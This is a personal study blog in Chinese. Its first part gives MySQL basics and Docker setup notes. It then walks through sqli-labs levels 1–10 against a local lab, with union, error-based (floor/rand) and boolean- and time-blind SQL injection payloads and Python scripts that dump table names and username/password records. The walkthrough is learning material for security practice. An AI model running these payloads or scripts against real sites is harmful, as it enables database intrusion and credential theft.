🚬🚬🚬

MySQL学习笔记

MySQL入门基础,mysql基础视频+数据库实战,老杜带你学

学习

安装

单元

库databases->表table->数据/记录row（行）/字段column（列）

常用命令

退出exit
查看mysql数据库的版本号select version();

查看数据库show databases;
使用某个数据库use test;
查看当前数据库select database();
创建数据库create database xxx;

查看数据库下有哪些表show tables;

终止\c ;

语句分类

查询DQL
select

操作DML（数据）
insert 增
delete 删
update 改

定义DDL（表的结构）
create 新建，等同于增
drop 删除
alter 修改

事务控制语言TCL

数据控制语言DCL

导入数据库

source sql文件地址
ps：路径中不能有中文

查询select…

查询字段
select 字段名1(,字段名2,字段名3,...) from 表名;
select * from 表名;（所有）

给查询的列起别名
select 字段名 as 别名 from 表名;
e.g:

原来
+---------------+
| yuanlaide     |
+---------------+
| test1         |
| test2         |
+---------------+
输入
select yuanlaide (as) change from 表名;
+------------+
| change     |
+------------+
| test1      |
| test2      |
+------------+

别名里面有空格用单引号括起来.

字段可以使用数学表达式

查看表的结构
desc 表名;

条件查询

语法格式：
	select
		字段1,字段2,字段3....
	from 
		表名
	where
		条件;

= 等于
<>或!= 不等于
< 小于
<= 小于等于
> 大于
>= 大于等于

and 并且
or 或者(and优先级高于or)
in 包含，相当于多个 or(in不是一个区间。in后面跟的是具体的值。)
like 模糊查询，支持%或下划线匹配
	%匹配任意多个字符
	下划线：任意一个字符。
	（%是一个特殊的符号，_ 也是一个特殊符号）

between … and …. 两个值之间, 等同于 >= and <=
e.g:
	select 
		empno,ename,sal 
	from 
		emp 
	where 
		sal >= 2450 and sal <= 3000;
-----------------------------
	select 
			empno,ename,sal 
		from 
			emp 
		where 
			sal between 2450 and 3000;

1 2	is null (不能用等号) is not null

排序

select 
	字段1,字段2,字段3....
from
	表名
order by
	按什么排;

(默认升序)

降/升

select 
	字段1,字段2,字段3....
from
	表名
order by
	按什么排 desc/asc;

综

select
	...
from
	...
where
	...
order by（排序总是在最后执行）
	...

数据处理函数（单行处理函数）

Lower 转换小写
upper 转换大写
substr 取子串（substr(被截取的字符串,起始下标[从1开始],截取的长度)）
length 取长度
trim 去空格
str_to_date 将字符串转换成日期
date_format 格式化日期
format 设置千分位
round() 四舍五入
rand 生成随机数
Ifnull 可以将null转换成一个具体值(NULL参与运算，结果为NULL)
concat 字符串拼接
case..when..then..when..then..else..end

分组函数（多行处理函数）

分组函数自动忽略NULL，你不需要提前对NULL进行处理。
分组函数不能够直接使用在where子句中。

分组函数可以组合起来一起用。

count	计数
count(具体字段)：表示统计该字段下所有不为NULL的元素的总数。
count(*)：统计表当中的总行数。（只要有一行数据count则++）
sum	求和
avg	平均值
max	最大值
min	最小值

分组查询

where执行的时候，还没有分组。所以where后面不能出现分组函数。
在一条select语句当中，如果有group by语句的话，select后面只能跟：参加分组的字段，以及分组函数。其它的一律不能跟。

使用having可以对分完组之后的数据进一步过滤。having不能单独使用，having不能代替where，having必须和group by联合使用。

一个完整的 select 语句格式如下
select 字段
from 表名
where …….
group by ……..
having …….(就是为了过滤分组后的数据而存在的—不可以单独的出现)
order by ……..
以上语句的执行顺序
1. 首先执行 where 语句过滤原始数据
2. 执行 group by 进行分组
3. 执行 having 对分组数据进行操作
4. 执行 select 选出数据
5. 执行 order by 排序

查询结果去除重复记录【distinct】

原表数据不会被修改，只是查询结果去重。
distinct只能出现在所有字段的最前方。

连接查询

跨表查询，多张表联合起来查询数据
两张表进行连接查询，没有任何条件限制的时候，最终查询结果条数，是两张表条数的乘积，这种现象被称为：笛卡尔积现象。
避免笛卡尔积现象：连接时加条件
效率：表起别名

内连接

等值连接（条件是等量关系，所以被称为等值连接。）
非等值连接（条件不是一个等量关系，称为非等值连接。）
自连接

外连接

左外连接（左连接） left
右外连接（右连接） right

多张表

select 
	...
from
	a
join
	b
on
	a和b的连接条件
join
	c
on
	a和c的连接条件
right join
	d
on
	a和d的连接条件

子查询

select语句中嵌套select语句

select
	..(select).
from
	..(select).
where
	..(select).

union合并查询

要求两个结果集的列数相同。

limit将查询结果集的一部分取出

mysql当中limit在order by之后执行

1
2
3

limit startIndex, length
startIndex是起始下标，length是长度。
起始下标从0开始。

综

select 
   ...
from
   ...
where
   ...
group by
   ...
having
   ...
order by
   ...
limit
   ...

执行顺序？
   1.from
   2.where
   3.group by
   4.having
   5.select
   6.order by
   7.limit..

表(create drop alter)

建表

create table 表名(字段名1 数据类型, 字段名2 数据类型, 字段名3 数据类型);

create table 表名(
	字段名1 数据类型, 
	字段名2 数据类型, 
	字段名3 数据类型
);

数据类型

varchar(最长255)
	可变长度的字符串
	比较智能，节省空间。
	会根据实际的数据长度动态分配空间。

	优点：节省空间
	缺点：需要动态分配空间，速度慢。

char(最长255)
	定长字符串
	不管实际的数据长度是多少。
	分配固定长度的空间去存储数据。
	使用不恰当的时候，可能会导致空间的浪费。

	优点：不需要动态分配空间，速度快。
	缺点：使用不当可能会导致空间的浪费。
+------------------+
int(最长11)
	数字中的整数型。等同于java的int。

bigint
	数字中的长整型。等同于java中的long。

float	
	单精度浮点型数据

double
	双精度浮点型数据

date
	短日期类型

datetime
	长日期类型

clob
	字符大对象
	最多可以存储4G的字符串。
	比如：存储一篇文章，存储一个说明。
	超过255个字符的都要采用CLOB字符大对象来存储。
	Character Large OBject:CLOB


blob
	二进制大对象
	Binary Large OBject
	专门用来存储图片、声音、视频等流媒体数据。
	往BLOB类型的字段上插入数据的时候，例如插入一个图片、视频等，
	你需要使用IO流才行。

删除表(如果存在)
drop table (if exists) 表名;

插入数据
insert into 表名(字段名1,字段名2,字段名3...) values(值1,值2,值3);

insert into t_user(id,name,birth,create_time) values
(1,'zs','1980-10-11',now()), 
(2,'lisi','1981-10-11',now()),
(3,'wangwu','1982-10-11',now());

日期相关

str_to_date
date_format
date 短
datetime 长
id 整数
name 字符串
birth 短日期
create_time 这条记录的创建时间：长日期类型
mysql短日期默认格式：%Y-%m-%d
mysql长日期默认格式：%Y-%m-%d %h:%i:%s
now() 系统当前时间(包含时分秒：datetime类型)

改
update 表名 set 字段名1=值1,字段名2=值2,字段名3=值3... where 条件;
没有条件限制会导致所有数据全部更新。

删
delete from 表名 where 条件;

34道作业题

分组函数、分组查询
select deptno,max(sal) as maxsal from emp group by deptno;

select 
	e.ename, t.*
from 
	emp e
join
	(select deptno,max(sal) as maxsal from emp group by deptno) t
on
	t.deptno = e.deptno and t.maxsal = e.sal;

select deptno,avg(sal) as avgsal from emp group by deptno;

select 
	 e.ename, t.*,e.sal
from
	emp e
join
	(select deptno,avg(sal) as avgsal from emp group by deptno) t
on
	e.deptno = t.deptno and e.sal > t.avgsal;

docker安装及配置及问题及解决问题

安装
 没有Hyper-V
出现install WSL2 kernel update的情况

靶机搭建

运行：docker info
出现balbala一大串和

WARNING: No blkio throttle.read_bps_device support
WARNING: No blkio throttle.write_bps_device support
WARNING: No blkio throttle.read_iops_device support
WARNING: No blkio throttle.write_iops_device support

百度了一下不重要

搜索sqli-labs：docker search sqli-labs
建立镜像：docker pull acgpiano/sqli-labs
查看存在的镜像：docker images
运行存在的镜像：docker run -dt --name sqli-labs -p 80:80 --rm acgpiano/sqli-labs

浏览器打开http://127.0.0.1/即可

以后重新开机，只要启动
docker start sqli-labs

出现问题：Unable to connect to the database:security
docker 运行 sqli-labs（ Unable to connect to the database:security）问题解决

sqlilabs

Less-1

?id=1
?id=1'
?id=1' --+
?id=1'order by 3 --+
?id=1'order by 4 --+
?id=-1'union select 1,2,3--+
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+ 
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

Less-2

变数字型其余同上

Less-3

''包围变成('')包围
'换成')其余同上

Less-4

变成("")包围
换成")其余同上

Less-5

布尔盲注，有报错反馈

1
2
3

?id=1'报错
?id=1'--+
?id=1'and length((select database()))=8--+

不想手注，抄了别人的代码[https://www.cnblogs.com/cmx666/p/15119740.html]

import requests
import string
url = "http://127.0.0.1/Less-5/"

normalHtmlLen = len(requests.get(url=url+"?id=1").text)

print("The len of HTML:"+str(normalHtmlLen))

dbNameLen = 0

while True:
    dbNameLen_url = url + "?id=1'+and+length(database())="+str(dbNameLen)+"--+"
    #print(dbNameLen_url)

    if len(requests.get(dbNameLen_url).text) == normalHtmlLen:
        print("The len of dbName:"+str(dbNameLen))
        break

    if dbNameLen == 30:
        print("Error!")
        break

    dbNameLen += 1

dbName = ""

for i in range(1, dbNameLen+1):
    for a in string.ascii_lowercase:
        dbName_url = url + "?id=1'+and+substr(database(),"+str(i)+",1)='"+a+"'--+"
        #print(dbName_url)
        if len(requests.get(dbName_url).text) == normalHtmlLen:
            dbName += a
            print(dbName)
            break

然后浅加了个查表的

normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

tableNameLen = 0

while True:
    tableNameLen_url = url + "?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit 0, 1))=" + str(tableNameLen) + "--+"
    response = requests.get(tableNameLen_url)
    if response.status_code == 200 and len(response.text) == normalHtmlLen:
        print("The len of table name: " + str(tableNameLen))
        break

    if tableNameLen == 50:
        print("Error!")
        break

    tableNameLen += 1

tableName = ""

for i in range(1, tableNameLen + 1):
    for a in string.ascii_lowercase:
        tableName_url = url + "?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0, 1)," + str(i) + ",1)='" + a + "'--+"
        response = requests.get(tableName_url)
        if response.status_code == 200 and len(response.text) == normalHtmlLen:
            tableName += a
            print(tableName)
            break

但是想起了不止一个表，求教chat老师（）后

normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

tableNames = []

tableIndex = 0

while True:
    tableNameLen = 0

    while True:
        tableNameLen_url = url + "?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit " + str(tableIndex) + ", 1))=" + str(tableNameLen) + "--+"
        response = requests.get(tableNameLen_url)
        if response.status_code == 200 and len(response.text) == normalHtmlLen:
            break

        if tableNameLen == 50:
            print("Error!")
            break

        tableNameLen += 1

    if tableNameLen == 50:
        break

    tableName = ""

    for i in range(1, tableNameLen + 1):
        for a in string.ascii_lowercase:
            tableName_url = url + "?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit " + str(tableIndex) + ", 1)," + str(i) + ",1)='" + a + "'--+"
            response = requests.get(tableName_url)
            if response.status_code == 200 and len(response.text) == normalHtmlLen:
                tableName += a
                break

    if tableName:
        tableNames.append(tableName)

    tableIndex += 1

print("Table names:")
for tableName in tableNames:
    print(tableName)

查列

normalHtmlLen = len(requests.get(url=url + "?id=1").text)
print("The len of HTML: " + str(normalHtmlLen))

columnNames = []

tableIndex = 0

while True:
    columnNameLen = 0

    while True:
        columnNameLen_url = url + "?id=1' and length((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit " + str(tableIndex) + ", 1))=" + str(columnNameLen) + "--+"
        response = requests.get(columnNameLen_url)
        if response.status_code == 200 and len(response.text) == normalHtmlLen:
            break

        if columnNameLen == 50:
            print("Error!")
            break

        columnNameLen += 1

    if columnNameLen == 50:
        break

    columnName = ""

    for i in range(1, columnNameLen + 1):
        for char in string.ascii_lowercase + string.digits:  # 包括字母和数字
            columnName_url = url + "?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit " + str(tableIndex) + ", 1)," + str(i) + ",1))=" + str(ord(char)) + "--+"
            response = requests.get(columnName_url)
            if response.status_code == 200 and len(response.text) == normalHtmlLen:
                columnName += char
                break

    if columnName:
        columnNames.append(columnName)

    tableIndex += 1

print("Column names in 'users' table:")
for columnName in columnNames:
    print(columnName)

然后我顺手搜了一下发现了个特别特别好的()

import requests
from bs4 import BeautifulSoup
db_name = ''
table_list = []
column_list = []
url = '''http://127.0.0.1/Less-5/?id=1'''
### 获取当前数据库名 ###
print('当前数据库名:')
payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+'''
r = requests.get(url+payload)
db_name = r.text.split(':')[-2]
print('[+]' + db_name)
### 获取表名 ###
print('数据库%s下的表名:' % db_name)
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name,i)
    r = requests.get(url+payload)
    if 'group_key' not in r.text:
        break
    table_name = r.text.split(':')[-2]
    table_list.append(table_name)
    print('[+]' + table_name)
### 获取列名 ###
#### 这里以users表为例 ####
print('%s表下的列名:' % table_list[-1])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1],i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    column_name = r.text.split(':')[-2]
    column_list.append(column_name)
    print('[+]' + column_name)
### 获取字段值 ###
#### 这里以username列为例 ####
print('%s列下的字段值:' % column_list[-2])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2],db_name,table_list[-1],i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)


#### password ####
print('%s列下的字段值:' % column_list[-1])
for i in range(50):
    payload = '''' and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-1],db_name,table_list[-1],i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)

但是问题来了家人们。。。我现在发现这题可以floor()报错注入
详细讲解双查询注入

?id=1' and(select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 1,1),floor(rand()*2)) as x from security.users group by x) as a)--+

Less-6

"包裹，其余同上

import requests
from bs4 import BeautifulSoup
db_name = ''
table_list = []
column_list = []
url = '''http://127.0.0.1/Less-6/?id=1'''
### 获取当前数据库名 ###
print('当前数据库名:')
payload = '''"and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)*2)))--+'''
r = requests.get(url+payload)
db_name = r.text.split(':')[-2]
print('[+]' + db_name)
### 获取表名 ###
print('数据库%s下的表名:' % db_name)
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (db_name,i)
    r = requests.get(url+payload)
    if 'group_key' not in r.text:
        break
    table_name = r.text.split(':')[-2]
    table_list.append(table_name)
    print('[+]' + table_name)
### 获取列名 ###
#### 这里以users表为例 ####
print('%s表下的列名:' % table_list[-1])
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (table_list[-1],i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    column_name = r.text.split(':')[-2]
    column_list.append(column_name)
    print('[+]' + column_name)
### 获取字段值 ###
#### 这里以username列为例 ####
print('%s列下的字段值:' % column_list[-2])
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-2],db_name,table_list[-1],i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)

#### password ####
print('%s列下的字段值:' % column_list[-1])
for i in range(50):
    payload = '''" and 1=(select count(*) from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)*2)))--+''' % (column_list[-1],db_name,table_list[-1],i)
    r = requests.get(url + payload)
    if 'group_key' not in r.text:
        break
    dump = r.text.split(':')[-2]
    print('[+]' + dump)

Less-7

双括号。。但是脚本跑不起来。。本来看到outfile打算试试导出文件了，结果老不成功。。

[原创]sqli-labs靶场第七关文件无法写入
 你没有权限在此位置中保存文件
 找不到 gpedit.msc 的最优解决办法
搜不到别的问题了，遂放弃

Less-8

盲注来了，盲注真的来了

import datetime
import requests
import re
import string


def time_tools(target_url, payload):
    start_time = datetime.datetime.now()
    response = requests.get(target_url + payload)
    end_time = datetime.datetime.now()
    sec = (end_time - start_time).seconds
    return sec


def get_database_length(target_url):
    for length in range(1, 10):
        payload = "?id=1' and if(length(database())={},sleep(1),0)--+".format(length)
        sec = time_tools(target_url, payload)
        if sec >= 1:
            print("Database length is {}".format(length))
            return length


def get_database_name(target_url):
    db_name = ''
    db_length = get_database_length(target_url)
    letters = string.ascii_lowercase + "_"
    for i in range(1, db_length + 1):
        for letter in letters:
            payload = "?id=1' and substring(database(),{},1)='{}' --+".format(i, letter)
            html_content = requests.get(target_url + payload).text
            result = re.findall("You are in...........", html_content)
            if not result:
                continue
            else:
                db_name += letter
                break
    print("Database name is {}".format(db_name))
    return db_name


def get_table_name_length(target_url):
    """
    爆表、列、字段原理一样,爆出表后改一下payload爆其他数据
    爆数据：
    "?id=1' and length((select concat(username,0x3a,password)from users limit {},1))={}--+"
    爆列：
    "?id=1' and length((select column_name from information_schema.columns " \
                      "where table_schema=database() and table_name='users' limit {},1))={}--+"
    爆表：
    "?id=1' and length((select table_name from information_schema.tables " \
                      "where table_schema=database() and table_name='users' limit {},1))={}--+"
    """
    table_name_length = []
    for i in range(15):
        for length in range(1, 50):
            payload = "?id=1' and length((select concat(username,0x3a,password)from users limit {},1))={}--+".format(i,
                                                                                                                     length)
            html_content = requests.get(target_url + payload).text
            result = re.findall("You are in...........", html_content)
            if result:
                table_name_length.append(length)
                # print(table_name_length)
                break
            else:
                continue
    return table_name_length


def get_table_name(target_url):
    """
    爆表和列原理一样,爆出表后改一下payload爆列
    """
    letters = string.ascii_lowercase + string.digits + '_:@-!'
    table_name = ''
    table_length = get_table_name_length(target_url)
    for length in range(0, len(table_length)):
        for i in range(1, table_length[length] + 1):
            for letter in letters:
                payload = "?id=1' and substring((select concat(username,0x3a,password)from users limit {},1),{},1)='{}'--+" \
                    .format(length, i, letter)
                html_content = requests.get(target_url + payload).text
                result = re.findall("You are in...........", html_content)
                if result:
                    table_name += letter
                    break
                else:
                    continue
            print("The injected data are {}".format(table_name))
        table_name += ','


if __name__ == '__main__':
    get_database_name("http://127.0.0.1/Less-8/")
    get_table_name("http://127.0.0.1/Less-8/")

好东西，抄了

Less-9

时间盲注，乐
sleep()

找了个代码，优点是好改，缺点是太慢了。。真的太慢了。。我吃了个雪糕回来还没跑完

#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time    : 2021/9/7 10:20
# @Author  : AA8j
# @Site    : 
# @File    : Time-based-blind-SQL-injection.py
# @Software: PyCharm
# @Blog    : https://blog.csdn.net/qq_44874645
import binascii

import requests
from fake_useragent import UserAgent


def get_tables(url, payload_header, payload_end):
    # 获取长度
    length = 100
    for L in range(1, 1000):
        payload = url + payload_header + \
                  "length((select group_concat(table_name) from information_schema.tables " \
                  f"where table_schema=database()))={L}" + payload_end
        print(f'\r正在获取当前库所有表名拼接后长度：{L}', end='')
        if judge_time(payload):
            print(f'\n当前库所有表名拼接后长度：{L}', end='')
            length = L
            break
        elif L == 999:
            print(f'\r无法获取当前库所有表名拼接后长度为：{L}', end='')
    print()

    # 获取值
    tables_name = ''
    for i in range(1, length + 1):
        print(f'\r正在获取第{i}个值：{tables_name}', end='')
        for ascii_num in range(39, 123):
            payload = url + payload_header + \
                      f"(select ascii(mid(group_concat(table_name),{i},1)) from information_schema.tables " \
                      f"where table_schema=database())={ascii_num}" + payload_end
            if judge_time(payload):
                tables_name += chr(ascii_num)
    tables_list = tables_name.split(',')
    print(f'\n获取所有表名结束：', end='')
    return tables_list


def get_columns(table_name, url, payload_header, payload_end):
    # 获取长度
    length = 1000
    for L in range(1, 10000):
        payload = url + payload_header + \
                  f"length((select group_concat(column_name) from information_schema.columns " \
                  f"where table_schema=DATABASE() AND " \
                  f"""table_name=0x{str(binascii.b2a_hex(table_name.encode(r"utf-8"))).split("'")[1]}))={L}""" \
                  + payload_end
        print(f'\r正在获取{table_name}表所有字段名拼接后长度：{L}', end='')
        if judge_time(payload):
            print(f'\n{table_name}表所有字段名拼接后长度为：{L}', end='')
            length = L
            break
        elif L == 999:
            print(f'\r无法获取当{table_name}表所有字段名拼接后长度：{L}', end='')
    print()

    # 获取值
    columns_name = ''
    for i in range(1, length + 1):
        print(f'\r正在获取第{i}个值：{columns_name}', end='')
        for ascii_num in range(39, 123):
            payload = url + payload_header + \
                      f"(select ascii(mid(group_concat(column_name),{i},1)) from information_schema.columns " \
                      f"where table_schema=DATABASE() AND table_name=" \
                      f"""0x{str(binascii.b2a_hex(table_name.encode(r"utf-8"))).split("'")[1]})={ascii_num}""" \
                      + payload_end
            if judge_time(payload):
                columns_name += chr(ascii_num)
    columns_list = columns_name.split(',')
    print(f'\n获取{table_name}表的所有字段名结束：', end='')
    return columns_list


def get_data(chose_table, column_list, url, payload_header, payload_end):
    # 获取记录
    columns_name = ''
    for i in column_list:
        columns_name += f",{i}"

    # 获取长度
    length = 10000
    for L in range(1, 10000):
        payload = url + payload_header + \
                  f"length((select group_concat(concat_ws(':'{columns_name})) from {chose_table}))={L}""" \
                  + payload_end
        print(f'\r正在获取{chose_table}表所有记录拼接后长度：{L}', end='')
        if judge_time(payload):
            print(f'\n{chose_table}表所有记录拼接后长度为：{L}', end='')
            length = L
            break
        elif L == 9999:
            print(f'\r无法获取当{chose_table}表所有记录拼接后长度：{L}', end='')

    print()
    data = []
    data_str = ''
    # 获取值
    for i in range(1, length + 1):
        print(f'\r正在获取第{i}个值：{data_str}', end='')
        for ascii_num in range(39, 123):
            payload = url + payload_header + \
                      f"(select ascii(mid(group_concat(concat_ws(':'{columns_name})),{i},1)) from {chose_table})" \
                      f"={ascii_num} " + payload_end
            if judge_time(payload):
                data_str += chr(ascii_num)

    data_list = data_str.split(',')
    for i in data_list:
        data.append(i.split(':'))
    print(f'\n获取{chose_table}表的所有记录结束：')
    return data


def judge_time(payload):
    # 判断响应时间
    time = html_get_time(payload)
    if 3 <= time < 6:
        return True
    else:
        return False


def html_get_time(url):
    # 返回响应时间
    req = requests.session()
    ua = UserAgent()
    headers = {'User-Agent': ua.random}
    timeout = 6
    response = req.get(url, headers=headers, timeout=timeout)
    return response.elapsed.seconds


def main():
    url = 'http://127.0.0.1/Less-9/?id=1'
    payload_header = "' and if("
    payload_end = ",sleep(3),1)--+"

    print('========Time-based-blind-SQL-injection==============')
    print('=====================By:AA8j========================')
    print('目标：' + url)

    # ------------------------获取表-------------------------------
    tables_list = get_tables(url, payload_header, payload_end)
    # tables_list = ['emails', 'referers', 'uagents', 'users']
    for i in range(0, len(tables_list)):
        print(f'{i + 1}.{tables_list[i]}', end=' ')
    chose_table = tables_list[int(input('\n请选择要获取字段的表名：')) - 1]

    # ------------------------获取字段-----------------------------
    columns_list = get_columns(chose_table, url, payload_header, payload_end)
    # columns_list = ['id', 'username', 'password']
    for i in range(0, len(columns_list)):
        print(f'{i + 1}.{columns_list[i]}', end=' ')
    print()

    # ------------------------获取记录-----------------------------
    data = get_data(chose_table, columns_list, url, payload_header, payload_end)
    # data = [['1', 'Dumb', 'Dumb'], ['2', 'Angelina', 'I-kill-you'], ['3', 'Dummy', 'p@ssword']]
    for i in columns_list:
        print(i.ljust(20), end='')
    print('\n' + '-' * len(columns_list) * 20)
    for i in data:
        for j in i:
            print(j.ljust(20), end='')
        print('\n' + '-' * len(columns_list) * 20)


if __name__ == '__main__':
    main()

Less-10

双引号，其余同上

LinTu's Blog

2023暑期学习week1